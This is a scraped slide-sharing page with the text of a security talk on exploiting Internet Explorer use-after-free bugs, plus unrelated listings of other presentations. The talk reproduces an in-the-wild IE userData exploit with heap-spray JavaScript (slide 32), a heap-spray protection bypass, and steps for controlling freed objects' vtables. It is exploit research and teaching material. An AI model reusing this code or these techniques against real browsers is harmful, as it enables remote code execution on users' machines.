aleatory persistent threat
play

Aleatory Persistent Threat A short story by Nico Waisman - PowerPoint PPT Presentation

Dec 24, 2023 •42 likes •862 views

Aleatory Persistent Threat A short story by Nico Waisman nicolas@immunityinc.com Twitter: @nicowaisman Aleatoricism is the creation of art by chance, exploiting the principle of randomness. The word derives from the Latin word alea, the

  1. Aleatory Persistent Threat A short story by Nico Waisman nicolas@immunityinc.com Twitter: @nicowaisman

  2. Aleatoricism is the creation of art by chance, exploiting the principle of randomness. The word derives from the Latin word alea, the rolling of dice.

  3. The time of remotes ruling the earth, is gone

  4. Servers got protected. Servers got protected. The world got cold The world got cold

  5. BROWSER BUGS!!!

  6. Advanced Persistent Threat

  7. Advanced ● Stealth ● Robustness ● Reliability

  8. Persistent Threat

  9. How does 0day get How does 0day get caught in the wild? caught in the wild?

  10. How does 0day get caught in the wild? ● IDS Protection ● Honeypots ● Unreliable Exploits

  11. Use after free Since the advance of software protection, developer education and compiler improvements, memory corruption bugs are dying. But browser use-after-free bugs are a very crude reality

  12. Use after free “ A use-after-free occurs when memory is used after it was previously deallocated.”

  13. Finding Use after free ● Method/Property retaining an object without incrementing the reference. ● Shallow copies (Aurora) ● Reference desynchronization ● Incorrect API usage Check out BH 2009: Attacking Interoperability (Dowd, Smith and Dewey)

  14. Exploiting Use after free 101 Allocation To be continued...

  15. COM: Component Object Model ● Language-central way of implementing objects ● Objects responsible for their own creation ● Maintenance of reference counter ● Widely used in Microsoft Languages

  16. COM: IUnknown All COM components must implement IUnknown interface

  17. OLE Automation ● Created by Microsoft to provide an interface to automate controllers ● Designed originally for scripting languages ● Allows you to access/call properties/methods by “names”

  18. OLE Automation Must implement the IDispatch interface

  19. OLE Automation bstrName = SysAllocString(OLESTR("cat")); hr = pObj->GetDispID(bstrName, 0, &dispid); hr = pObj->InvokeEx(dispid, LOCALE_USER_DEFAULT, DISPATCH_PROPERTYGET, &dispparamsNoArgs, &var, NULL, NULL);

  20. OLE Automation Must implement the IDispatch interface

  21. Variants ● Commonly used in jscript to communicate with COM objects ● Data type containing a type field and a union member used as a generic variable

  22. Variants ● Variants can also reference objects e.g. idispatch pointers: #define VT_DISPATCH 9 IDispatch __RPC_FAR* pdispVal;

  23. Variant manipulation VariantInit(var *) Initializes the VARIANT by setting it to VT_EMPTY VariantClear( var*) Clears the VARIANT, if the VARIANT type is VT_DISPATCH, it will be Release()'d VariantCopy(var *source, var *dest) Clears the destination VARIANT and copies the source to it, increments the reference by one

  24. Variant manipulation VarianChangeType(var dest, var src, short wFlags, VARTYPE vt) Converts a VARIANT from SRC type to the type indicated in the VT argument. Clears the destination before copying the content

  25. IE_PEERs ● The bug was being exploited in the wild ● Payload downloaded and executed a binary file from notes.topix21century.com ● GLOBAL HIGH SECURITY RISK!!(tm) ● Deeper research showed that the “A” in APT was for Aleatory

  26. IE_PEERs ● IE 5.5 introduces DHTML Behaviors ● “Behaviors are components that encapsulate specific functionality or behavior on a page.” ● e.g. Enhance a web element behavior

  27. IE_PEERs ● One of the default behaviors was Persistence ● Persistence enables authors to specify an object to persist on the client during the current and later sessions ● “userData” persists page state and information within an XML store, a hierarchical data structure

  28. IE_PEERs setAttribute(sAttrName, vAttrValue) Set the value of a specific attribute To persist the vAttrValue, it calls VariantChangeTypeEx to transform the source into a string. It passes the same variable as source and destination arguments

  29. IE_PEERs

  30. RECAPITULATING ● Use after free is all about playing with the REF counter ● Exploiting seems trivial, you just replace the free chunk with something useful

  31. Aleatory Persistent Threat

  32. <html> <body> <button id="helloworld" onclick="blkjbdkjb();" STYLE="DISPLAY:NONE"> </button> <script language="JavaScript" src="bypasskav.txt"> </script> <script language="JavaScript"> function eejeefe(){ var s=unescape("%u0c0c"); var u=unescape("%u0c0c"); var c=s+u; var array = new Array(); var ls = 0x86000-(c.length*2); var b = unescape("%u0c0c%u0c0C"); while(b.length<ls/2){ b+=b; } var lh = b.substring(0,ls/2); delete b; for(i=0;i<270;i++) { array[i] = lh + lh + c;} } function blkjbdkjb(){ Fail #1 eejeefe(); var sdfsfsdf = document.createElement("BODY"); sdfsfsdf.addBehavior("#default#userData"); document.appendChild(sdfsfsdf); try { Fail #2 for (i=0;i<10;i++) { sdfsfsdf.setAttribute('s',window); } }catch(e) {} Fail #3 window.status+=''; } document.getElementById("helloworld").onclick(); </script> </body> </html>

  33. Chunk Norris fact #1 “HEAP SPRAY MAKES EXPLOIT WRITERS DULL BOYS”

  34. Randomness But WHY does it still “work”? Heap spray

  35. Pray after free

  36. Pray after free 1) Free object gets randomly allocated with a string or something else, that ends up pointing to heap spray controlled memory 2) Free object gets the vtable LSB modified by LFH USERBLOCK offset (more on this later), which somehow ends up pointing to heap spray controlled memory

  37. Pray after free

  38. Pray after free (analogies)

  39. Like going to war with a Russian roulette gun

  40. Like looking for porn in ChatRoulette

  41. Use after free (the right way)

  42. 1) Understand what you are freeing Understand what you are freeing: a) Can it be controlled? b) Find out the precise size of the object!

  43. 1) Understand what you are freeing ● Every javascript object in mshtml.dll (documents, window, elements, etc) is represented via a Tear Off Interface ● A Tear Off interface works as a wrapper for the other objects, creating the real object only when a client needs it and maintaining references.

  44. 1) Understand what you are freeing Tear Off objects are the ones passed to setAttribute

  45. 2) Replacement with controlled data ● Objects contain the vtable pointer as the first DWORD in memory. Jscript strings cannot be used anymore as they are layed out as: DWORD Size + String ● Possible alternative: Checking DOM Element Properties/Methods allocation ● Insert your own idea

  46. Element properties (static analysis) ● Every Element inherits from CElement and as a consequence from Cbase. ● Every Element should override the GetClassDesc method which returns information about the Element.

  47. Element properties (static analysis) CLASS DESC […] *HDLDESC HDLDESC […] StringTableAggregate **Celement_StringTable **CXXXXX_StringTable

  48. Element properties (static analysis) ● StringTable holds a big array of CAssocVTable structures with the info about every property ● CBase::GetDispID and Cbase::InvokeEx widely use CAssocVTable to internally find every property setter/getter

  49. CAssocVTable DWORD *PropDesc DWORD val PropDesc BYTE wIIDIndex_function DWORD *HandleProperty BYTE wIIDIndex_UUID WCHAR *pstrName SHORT wIndex WCHAR *pstrExposedName DWORD hash […] DWORD dwPPFlag DWORD dispID DWORD dwFlags WORD wInvFunc WORD wMaxstrLen *Getter() *Setter()

  50. Element properties (static analysis) ● Property setter/getter is obtained by calling an argument setting function: uuid = UUID_LIST[ CassocVTable->wIIDIndex_UUID ] object = Cbase::QueryInterface(uuid) function_index = CassocVTable->wIIDIndex_function FUNC_LIST[PropDesc->WInvFunc]( object, function_ndx , ...) The property function is: object->vtable + 0x1C + function_ndx*4

  51. Element properties (static analysis)

  52. Element properties (dynamic analysis) Dispid + Property name GetDispID InvokeEx Set Allocation hooks Log by dispid RtlAllocateHeap Size + Mem RtlFreeHeap Mem InvokeEx (ret) Show results

  53. Element properties (dynamic analysis) var c = document.createElement( "P" ); for(var x in c) { try { c[x] = “COCACOLA”; } catch (e) { } }

  54. Element properties (dynamic analysis)

  55. Element properties (dynamic analysis) var c = document.createElement( "P" ); for(var x in c) { try { c[x] = “COCACOLA”; } catch (e) { } }

  56. Use after free Exploitation is now trivial: ● Free the object ● Allocate chunks through DOM properties ● Use the object The vtable is under our control, at which point heap spraying now makes sense

  57. Chunk Norris fact #2 “WINNERS USE HEAP SPRAY CONCIOUSL Y ”

  58. Heap Spray IE 8 introduced a weak Heap Spray protection. Trivially bypassed with a small tweak: h1[0] = nops + shellcode; for (var i = 1 ; i < 100 ; i++) { h1[i] = h1[0].substring(0, h1[0].length ) }

  59. Exploiting Use after free (in a non traditional way)

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Survivability Analysis of a Computer System under an Advanced Persistent Threat Attack guez

Survivability Analysis of a Computer System under an Advanced Persistent Threat Attack guez

Survivability Analysis of a Computer System under an Advanced Persistent Threat Attack guez , Xiaolin Chang , Xiaodan Li , Kishor S. Trivedi Ricardo J. Rodr rjrodriguez@unizar.es , xlchang@bjtu.edu.cn , { xiaodan.li,ktrivedi }

420 views • 26 slides
(or Informa5onized Force Opera5ons) Michael K. Daly November 4, 2009 What is meant by Advanced,

(or Informa5onized Force Opera5ons) Michael K. Daly November 4, 2009 What is meant by Advanced,

The Advanced Persistent Threat (or Informa5onized Force Opera5ons) Michael K. Daly November 4, 2009 What is meant by Advanced, Persistent Threat? Increasingly sophis5cated cyber aIacks by hos5le organiza5ons with the goal of: Gaining

872 views • 50 slides
Portable Passive Detection of Advanced Persistent Threats APT Catcher Author: Guido Kroon

Portable Passive Detection of Advanced Persistent Threats APT Catcher Author: Guido Kroon

Portable Passive Detection of Advanced Persistent Threats APT Catcher Author: Guido Kroon Supervisors: Marco Davids, Christian Hesselman (SIDN) About Advanced Persistent Threats Advanced Persistent Threat (APT) [2]; Highly skilled and

342 views • 32 slides
Persistent Reference on the Web Jonathan Rees Creative Commons W3C TAG F2F 20 October 2010

Persistent Reference on the Web Jonathan Rees Creative Commons W3C TAG F2F 20 October 2010

Persistent Reference on the Web Jonathan Rees Creative Commons W3C TAG F2F 20 October 2010 Wednesday, October 20, 2010 Outline of the memo you read Persistence and persistent reference Gambling / trust Threat model Prevention

612 views • 20 slides
to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection

to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection

Fake Antivirus- Journey from Trojan to a Persistent Threat Jagadeesh Chandraiah DeepSec 2011 Agenda FakeAV Trends Infection Vectors Packer Evolution How do they work ? DeepSec 2011 Introduction Fake AntiVirus (FakeAV) is a

794 views • 51 slides
Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat

Who Whos Really Attacking Y s Really Attacking Your our #WHOAMI Threat Researcher at Trend Micro- research and blogger on criminal underground, persistent threats,

792 views • 44 slides
Assessment What is Threat Assessment Threat assessment is the process of gathering

Assessment What is Threat Assessment Threat assessment is the process of gathering

Threat Assessment What is Threat Assessment Threat assessment is the process of gathering information to understand the threat of violence posed by a person. Threat management is the process of developing and executing plans to mitigate

332 views • 15 slides
Phases of Disaster Despair Threat Threat Phase: Small events serve as a warning or threat to

Phases of Disaster Despair Threat Threat Phase: Small events serve as a warning or threat to

Honeymoon Threat Restoration Rescue Phases of Disaster Despair Threat Threat Phase: Small events serve as a warning or threat to normal living. A disaster has not yet oc- curred, but there is a sense of impending doom. Individual

604 views • 6 slides
What Does This Advanced Threat Landscape Look Like? Advanced Threat Landscape

What Does This Advanced Threat Landscape Look Like? Advanced Threat Landscape

DDoS &amp; Modern Threat Motives Dan Holden Director, ASERT What Does This Advanced Threat Landscape Look Like? Advanced Threat Landscape Geo-poli:cal More defenses ? App/Content t a

1.13k views • 44 slides
Distributed Shared Persistent Memory (SoCC 17) Yizhou Shan, Yiying Zhang Persistent Memory

Distributed Shared Persistent Memory (SoCC 17) Yizhou Shan, Yiying Zhang Persistent Memory

Distributed Shared Persistent Memory (SoCC 17) Yizhou Shan, Yiying Zhang Persistent Memory (PM/NVM) CPU Byte Addressable Persistent Cache Low Latency Capacity Cost effective PM DRAM 2 Many PM Work, but All in Single Machine

712 views • 33 slides
Active Threat on Campus Prevention &amp; Response Active threat defined An active threat can be

Active Threat on Campus Prevention &amp; Response Active threat defined An active threat can be

Active Threat on Campus Prevention &amp; Response Active threat defined An active threat can be defined as: A person whose immediate activity can cause death and/or serious injury An active threat can involve a firearm or another

395 views • 15 slides
Assessment of sinoatrial node function at patients with persistent and long-standing persistent

Assessment of sinoatrial node function at patients with persistent and long-standing persistent

Assessment of sinoatrial node function at patients with persistent and long-standing persistent forms of atrial fibrillation after Maze III procedure combined with a mitral valve operation A.A. Kulikov, L.A. Bokeria Bakoulev Scientific Center

267 views • 12 slides
Offensive Threat Modeling for Attackers turning threat modeling on its head Rafal M. Los

Offensive Threat Modeling for Attackers turning threat modeling on its head Rafal M. Los

Offensive Threat Modeling for Attackers turning threat modeling on its head Rafal M. Los Chief Security Evangelist HP Software Shane MacDougall Principal Tactical Intelligence Modern threat modeling is a defensive response to

783 views • 52 slides
Cyber Kill Chain Jay Chen, Ruben Ocana, Senna Alsadam, Andrew Shi Modern Security Threats

Cyber Kill Chain Jay Chen, Ruben Ocana, Senna Alsadam, Andrew Shi Modern Security Threats

Cyber Kill Chain Jay Chen, Ruben Ocana, Senna Alsadam, Andrew Shi Modern Security Threats New class of threat actors called Advanced Persistent Threat (APT) Data compromised for economic or military advancement Conventional

701 views • 32 slides
Hardware Support for ACID Transactions in Persistent Memory Arpit Joshi , Vijay Nagarajan, Marcelo

Hardware Support for ACID Transactions in Persistent Memory Arpit Joshi , Vijay Nagarajan, Marcelo

Hardware Support for ACID Transactions in Persistent Memory Arpit Joshi , Vijay Nagarajan, Marcelo Cintra, Stratis Viglas NVMW 2019 Persistent Memory Systems L1 L1 LLC Persistent Memory 2 Persistent Memory Systems L1 L1 Persistent

1.1k views • 70 slides
Threat Modeling and S haring S ummary Proposal to kick off Threat Modeling proj ect

Threat Modeling and S haring S ummary Proposal to kick off Threat Modeling proj ect

Threat Modeling and S haring S ummary Proposal to kick off Threat Modeling proj ect Multi-phase approach Initially: create Cyber Domain PIM and S TIX PS M with UML Profile for NIEM Expand to other PS M, create Threat Meta

211 views • 10 slides
From Privacy Protection to Interface Design: Implementing Information Privacy in Human-Computer

From Privacy Protection to Interface Design: Implementing Information Privacy in Human-Computer

From Privacy Protection to Interface Design: Implementing Information Privacy in Human-Computer Interactions Andrew S. Patrick Steve Kenny Independent Consultant National Research Council of Canada stephen_mh_kenny@yahoo.com

407 views • 22 slides
Developm ent of convergent J2 EE applications for OpenSER Elias Baixas Morat Engineer

Developm ent of convergent J2 EE applications for OpenSER Elias Baixas Morat Engineer

Developm ent of convergent J2 EE applications for OpenSER Elias Baixas Morat Engineer VozTelecom Sistemas Development of convergent J2EE applications for OpenSER SIP is a difficult protocol (you know what I mean ?) Have you ever received a

371 views • 18 slides
Authentication, Authorisation and Accounting in a Distributed Multimedia Content Delivery System

Authentication, Authorisation and Accounting in a Distributed Multimedia Content Delivery System

Authentication, Authorisation and Accounting in a Distributed Multimedia Content Delivery System Miros aw Czyrnek (majrek@man.poznan.pl) Marcin Lubo ski (laser@man.poznan.pl) Cezary Mazurek (mazurek@man.poznan.pl) AGENDA AGENDA

447 views • 22 slides
ES6, ES7, WHERE DO I START??? OH CRAP J AVA S C R I P T C H A N G E D A G A I N ! HI, I'M

ES6, ES7, WHERE DO I START??? OH CRAP J AVA S C R I P T C H A N G E D A G A I N ! HI, I'M

ES6, ES7, WHERE DO I START??? OH CRAP J AVA S C R I P T C H A N G E D A G A I N ! HI, I'M RAYMOND! Developer Advocate for IBM Focused on Node, API, Serverless, and Enterprise Cat Demos Blogging at www.raymondcamden.com

602 views • 39 slides
More about HTML 20 April 1999 Administrivia 4 handouts in back (including this one)

More about HTML 20 April 1999 Administrivia 4 handouts in back (including this one)

Computer Science E-1: Introduction to Personal Computers and the Internet Spring 1999 More about HTML 20 April 1999 Administrivia 4 handouts in back (including this one) Assignment 9 is due this week; assignment 10 is due next week

522 views • 6 slides
Ajax Jeremy Keith clear:left buzz word buzz word 2 . 0 long tail participation

Ajax Jeremy Keith clear:left buzz word buzz word 2 . 0 long tail participation

Ajax Jeremy Keith clear:left buzz word buzz word 2 . 0 long tail participation RSS Ajax mashups open data folksonomy APIs word SapirWhorf hypothesis Its really several technologies, each flourishing in its

882 views • 55 slides
Mobile Web Kenneth Rohde Christiansen Kenneth Rohde Christiansen Web Platform Architect at

Mobile Web Kenneth Rohde Christiansen Kenneth Rohde Christiansen Web Platform Architect at

The Road to the Native Mobile Web Kenneth Rohde Christiansen Kenneth Rohde Christiansen Web Platform Architect at Intel Europe Blink core owner and former active WebKit reviewer Works on Chromium, Crosswalk and related projects 2

620 views • 46 slides
EOS: E Exactly xactly- -O Once E nce E- -S Service Middleware ervice Middleware EOS:

EOS: E Exactly xactly- -O Once E nce E- -S Service Middleware ervice Middleware EOS:

EOS: E Exactly xactly- -O Once E nce E- -S Service Middleware ervice Middleware EOS: German Shegalov, Gerhard Weikum Roger Barga, David Lomet (University of Saarland, Germany) (Microsoft Research, U.S.A.) PRESS THE SUBMIT BUTTON ONCE

467 views • 25 slides

More recommend